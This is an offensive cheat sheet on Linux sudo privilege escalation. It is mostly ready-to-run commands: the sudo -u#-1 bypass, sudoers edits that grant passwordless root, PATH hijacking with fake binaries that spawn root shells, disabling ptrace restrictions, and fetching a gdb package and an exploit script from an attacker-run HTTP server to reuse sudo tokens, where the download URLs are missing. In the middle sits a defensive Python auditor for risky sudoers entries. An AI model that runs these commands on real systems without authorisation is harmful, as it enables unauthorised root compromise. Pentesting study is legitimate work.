Sudo Privilege Escalation

Last modified: 2023-10-30

Privilege Escalation

Commands that a user is allowed to run through sudo can often be abused for privilege escalation (PrivEsc).

GTFOBins lists a wide variety of sudo-based privilege escalation payloads, so it is worth checking there first.


Check the sudo version.

sudo --version

If the sudo version is <=1.28, try the following command.

sudo -u#-1 /bin/bash

As Another User

sudo su root
sudo -u john whoami
# -s: run shell as target user
sudo -s

List Privileged Commands

We may be able to list the commands we are allowed to run as other users.

sudo -l
sudo -ll

# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash

We might also read the sudoers configuration directly from the following files.

cat /etc/sudoers
cat /etc/sudoers.d/usersgroup

If the sudoers output contains the following entry,

(ALL, !root) NOPASSWD: /bin/bash

we might be able to get a root shell as follows.

sudo -u#-1 /bin/bash

Edit Sudoers

If we have permission to write /etc/sudoers, we can modify this file.

sudo visudo -f /etc/sudoers

Now add one of the following lines to allow us to execute commands as root.
Assume we are logged in as john.

# Unrestricted: all commands as root without a password
john ALL=(root) NOPASSWD: ALL

# A specific command as root
john ALL=(root) NOPASSWD: /usr/bin/passwd

Command Forgery (NOPASSWD)

If you are allowed to execute a command that sudoers references by name rather than by absolute path, you can substitute your own file of the same name.
First, check the entry's properties.

sudo -l
(root) NOPASSWD: somecmd

If you confirm that it runs as root without a password, create a file with the same name in any directory you can write to.

# payload: a file that starts a shell
echo /bin/sh > /tmp/somecmd

Next, make it executable and prepend its directory to PATH.

chmod +x /tmp/somecmd
export PATH=/tmp:$PATH

Now execute the command as root.

sudo somecmd
# root

Command Forgery (SETENV, NOPASSWD)

If the sudoers entry carries the SETENV: tag, you can set PATH (and other environment variables) when running the command.

sudo -l
(root) SETENV: NOPASSWD: somecmd

As in the previous section, prepare the payload.

echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd

Now run the command as root with PATH set on the command line.

sudo PATH=/tmp:$PATH somecmd

Command Path Hijacking

sudo -l
(root) python /home/user/

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead, check whether we have write permission on any directory listed in secure_path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Suppose we can write an arbitrary binary under /usr/sbin; we can place a payload there.
For example, we create a fake python binary under /usr/sbin.

echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python

Then execute the sudo command.

sudo python /home/user/

Now we should get a root shell.
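The sections above describe the sudoers patterns that make these tricks possible: a deny-based runas list such as (ALL, !root), the SETENV tag, a NOPASSWD command given by name rather than by absolute path, and a missing secure_path or disabled env_reset. As an added example (not part of the original notes), the following Python script audits a sudoers fragment for exactly those patterns; the sudoers text is constructed for the demo and the finding labels are my own.

```python
import re

# Constructed sudoers fragment for this demo; it is not taken from any real host.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root  ALL=(ALL:ALL) ALL
john  ALL=(ALL, !root) NOPASSWD: /bin/bash
alice ALL=(root) SETENV: NOPASSWD: /usr/bin/somecmd
bob   ALL=(root) NOPASSWD: somecmd
carol ALL=(root) /usr/bin/python /home/carol/
"""

# A user specification: user host=(runas) [TAG: ...] command list
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*(.*)$")


def audit_sudoers(text):
    """Return (subject, finding, detail) tuples for the risky patterns discussed above."""
    findings = []
    lines = [l.strip() for l in text.splitlines()]
    defaults = " ".join(l for l in lines if l.startswith("Defaults"))
    # Without secure_path, or with env_reset disabled, the caller's PATH reaches the command.
    if "!env_reset" in defaults or "secure_path" not in defaults:
        findings.append(("Defaults", "path-not-locked", defaults))
    for line in lines:
        m = RULE_RE.match(line)
        if not line or line.startswith(("#", "Defaults")) or not m:
            continue
        user, runas, rest = m.group("user"), m.group("runas"), m.group("rest")
        runas_items = [r.strip() for r in runas.split(",")]
        # A deny-based runas list such as (ALL, !root) should be an allow-list instead.
        if any(r.split(":")[0] == "ALL" for r in runas_items) and any(r.startswith("!") for r in runas_items):
            findings.append((user, "runas-excludes-root", runas))
        tags = []  # peel "SETENV:" / "NOPASSWD:" tags off the front of the command list
        while True:
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = t.group(2)
        for spec in filter(None, (s.strip() for s in rest.split(","))):
            cmd = spec.split()[0]  # the command word, without its arguments
            if "SETENV" in tags:  # the caller may override PATH for this command
                findings.append((user, "setenv", cmd))
            if "NOPASSWD" in tags and cmd != "ALL" and not cmd.startswith("/"):
                findings.append((user, "relative-command", cmd))  # resolved through PATH
    return findings
```

Run it over the real file with `audit_sudoers(open("/etc/sudoers").read())` (as root) to list entries worth tightening; it does not follow #include directives.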

Shell in Prompt


read -p "What's your name: "

If another user's script that can be executed as root reads input with a prompt like this, you can enter `/bin/bash -i` to get a shell as another user.

Reuse Sudo Tokens


If the current user has executed some command with sudo, we might be able to reuse its sudo token to escalate to root. First check that ptrace is not restricted.

cat /proc/sys/kernel/yama/ptrace_scope

# We can temporarily set it to 0 if we have permission.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope

If the target system does not have a gdb binary, we can download it.

# On the local machine, download the Debian package.
wget -O gdb.deb
python3 -m http.server

# On the remote machine, fetch the deb package and extract it.
dpkg -x gdb.deb ~

Next, prepare the exploit script from the repo and execute it.

# On the local machine, serve the exploit shell script.
python3 -m http.server

# On the remote machine, download it and execute it.

After that, we can spawn the root shell.

sudo su